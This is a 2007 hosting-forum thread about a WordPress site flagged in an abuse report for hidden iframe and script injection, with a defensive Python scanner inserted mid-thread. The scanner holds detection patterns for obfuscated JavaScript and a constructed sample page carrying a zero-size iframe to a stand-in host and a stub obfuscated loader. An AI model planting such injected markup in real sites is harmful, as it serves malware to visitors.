  1. #1

    Received email from Softlayer Abuse about Malware

    Hi,

    I received this ticket from softlayer's abuse department:

    --------

    The following is a list of IP addresses on your network which we have good reason to believe may be compromised systems engaging in malicious activity. Please investigate and take appropriate action to stop any malicious activity you verify.

    The following is a list of types of activity that may appear in this
    report:
    BEAGLE BEAGLE3 BLASTER BOTNETS BOTS BRUTEFORCE
    DAMEWARE DEFACEMENT DIPNET DNSBOTS MALWAREURL MYDOOM
    NACHI PHATBOT PHISHING ROUTERS SCAN445 SCANNERS
    SINIT SLAMMER SPAM SPYBOT TOXBOT

    Open proxies and open mail relays may also appear in this report.
    Open proxies are designated by a two-character identifier (s4, s5, wg, hc, ho, hu, or fu) followed by a colon and a TCP port number. Open mail relays are designated by the word "relay" followed by a colon and a TCP port number.

    A detailed description of each of these may be found at
    https://security.gblx.net/reports.html

    NOTE: IPs identified as hosting botnet controllers, phishing websites, or malware distribution sites (marked with BOTNETS, PHISHING, or MALWAREURL respectively) may be null routed by Global Crossing following a separately emailed notice. We will make every effort to avoid taking action which will impact legitimate services on your network, and we will now send notices of botnet controllers within one hour of their detection.

    This report is sent every day. If you would prefer a weekly report, sent on Mondays, please contact us by replying to this email to request it. We would prefer, however, that you receive and act upon these reports daily.

    Unless otherwise indicated, time stamps are in UTC (GMT).



    36351 | 74.xx.xxx.xxx | 2007-12-25 14:50:13 http://xxxxxxxx MALWAREURL | SOFTLAYER - SoftLayer Technologies Inc.

    36351 | 74.xx.xxx.xxx | 2007-12-25 15:56:20 http://xxxxxxxx MALWAREURL | SOFTLAYER - SoftLayer Technologies Inc.

    ------

    Both the URLs indicated are from the one site, containing a WordPress installation.

    The pages simply have a little bit of text and an embedded YouTube video and nothing else. No comments.

    So what could be the problem? Don't understand this at all.

  2. #2
    They're telling you that you have a compromised server. Investigate it.
    WHMCS Guru - WHMCS addons, management, support and more.
    WHMCS Notifications Extended - Add slack, hipchat, SMS, pushover to WHMCS !!
    Always looking for Linux, WHMCS, Support Desk work. PM for details

  3. #3
    Okay, thanks, I've told PSM about it.

  4. #4
    Quote Originally Posted by linux-tech View Post
    They're telling you that you have a compromised server. Investigate it.

    What you need to do is find the source.

    If you do not know how to clean out your server(s) and find where this is happening from you might need to check into getting a server administration service.

    I know that I have had this same problem. I contacted my administration company and he gave me proof that it was removed to send to the datacenter. I use www.cpadmin.net. If you want to try them out, it is $50.00/month.

  5. #5
    I think TS already has their own, as I assume PSM is Platinum Server Management.

  6. #6
    Most likely those sites got exploited and a malicious iframe and JavaScript have been embedded into them. I'd look for that.
    Tony B. - Chief Executive Officer
    Hawk Host Inc. Proudly serving websites since 2004
    Quality Shared and VPS Hosting
    PHP 5.3.x & PHP 5.4.x & PHP 5.5.X & PHP 5.6.X & PHP 7.0.X Support!

  7. #7
    Hi, yes, PSM = Platinum Server Management.

    They are looking into it for me.

    How does this happen exactly?

  8. #8
    Quote Originally Posted by TonyB View Post
    Most likely those sites got exploited and a malicious iframe and JavaScript have been embedded into them. I'd look for that.
    Okay, I looked at the source code, and at the bottom of the page, right after the html tag, I found this:

    Code:
    <iframe src=<<removed>></iframe><script><<removed>></script>
    What is this and how did this get there??

    They hacked wordpress?
    Last edited by sirius; 12-28-2007 at 03:24 PM. Reason: removed malware code....
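One way to hunt for what TonyB suggests in #6 and what turned up in #8 (markup appended after the closing </html> tag of every page, an iframe sized or styled so the visitor never sees it, and an obfuscated script loader next to it) is to scan the document root for those three footprints. The scanner below is an added example, not code from this thread, from WordPress or from any of the companies mentioned; the two sample pages, the directory layout and the `example.invalid` host are constructed for illustration.

```python
"""
Scan template and page files for the injected-markup pattern described in
this thread.  Added example; the sample pages and paths below are constructed.
"""
import re
import tempfile
from pathlib import Path

# A template never legitimately emits anything after </html>; content there is
# the footprint of an "append to footer.php / index.php" style injection.
TRAILING_AFTER_HTML = re.compile(r"</html>\s*(?P<tail>\S.*)$", re.IGNORECASE | re.DOTALL)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SCRIPT = re.compile(r"<script\b[^>]*>(?P<body>.*?)</script>", re.IGNORECASE | re.DOTALL)
# Zero/one-pixel dimensions or CSS hiding make an iframe invisible to the visitor.
HIDDEN_IFRAME = re.compile(
    r"((width|height)\s*[=:]\s*[\"']?(?:0|1)(?!\d)|display\s*:\s*none|visibility\s*:\s*hidden)",
    re.IGNORECASE,
)
# Crude but effective signals of an obfuscated loader script.
OBFUSCATED_JS = re.compile(r"(unescape\s*\(|eval\s*\(|String\.fromCharCode)", re.IGNORECASE)


def find_injected_markup(page: str) -> list:
    """Return (reason, snippet) findings for the source of one page."""
    findings = []
    m = TRAILING_AFTER_HTML.search(page)
    if m:
        findings.append(("content after </html>", m.group("tail").strip()[:80]))
    for tag in IFRAME.finditer(page):
        if HIDDEN_IFRAME.search(tag.group(0)):
            findings.append(("hidden iframe", tag.group(0)[:80]))
    for s in SCRIPT.finditer(page):
        if OBFUSCATED_JS.search(s.group("body")):
            findings.append(("obfuscated script", s.group("body").strip()[:80]))
    return findings


def scan_tree(root: Path, suffixes=(".php", ".html", ".htm")) -> dict:
    """Walk a document root and map each suspicious file to its findings."""
    report = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            hits = find_injected_markup(text)
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report


# Constructed sample pages: a clean page with a normal YouTube embed, and a page
# carrying the kind of injection described in the thread (host is fictitious).
CLEAN_PAGE = (
    '<html><body><p>Hello</p><iframe src="https://www.youtube.com/embed/x" '
    'width="425" height="350"></iframe></body></html>\n'
)
INJECTED_PAGE = (
    "<html><body><p>Hello</p></body></html>\n"
    '<iframe src="http://example.invalid/in.php" width=0 height=0></iframe>'
    "<script>document.write(unescape('%3C%69%66%72'))</script>"
)


def demo_scan() -> dict:
    """Write the constructed pages into a temporary docroot and scan it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        theme = root / "wp-content" / "themes" / "x"
        theme.mkdir(parents=True)
        (root / "index.html").write_text(CLEAN_PAGE)
        (theme / "footer.php").write_text(INJECTED_PAGE)
        return scan_tree(root)


if __name__ == "__main__":
    for name, hits in demo_scan().items():
        print(name)
        for reason, snippet in hits:
            print(f"  {reason}: {snippet}")
```

Run it against the real document root (`scan_tree(Path("/home/user/public_html"))`) rather than the demo; a hit on content after `</html>` in a theme footer or in `index.php` is the file to diff against a clean copy of the same WordPress or theme version. The dimension check deliberately accepts `width=1`/`height=1` as hidden too, since a one-pixel frame is as invisible as a zero-pixel one.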

  9. #9
    That clearly looks bad. Have you removed it yet?

  10. #10
    Yes, it was because I was running an older version of WordPress, I believe.

    I completely re-installed to the newer version and removed the hidden iframe. The iframe was actually at the bottom of pretty much every page.

    Hopefully it's fixed now.
    Last edited by jumpinjack; 12-28-2007 at 12:21 PM.

  11. #11
    Yup, that's how they work these days. Pretty tricky.

    Luckily Google has gotten into the act and will delist sites that have this type of infection on them.
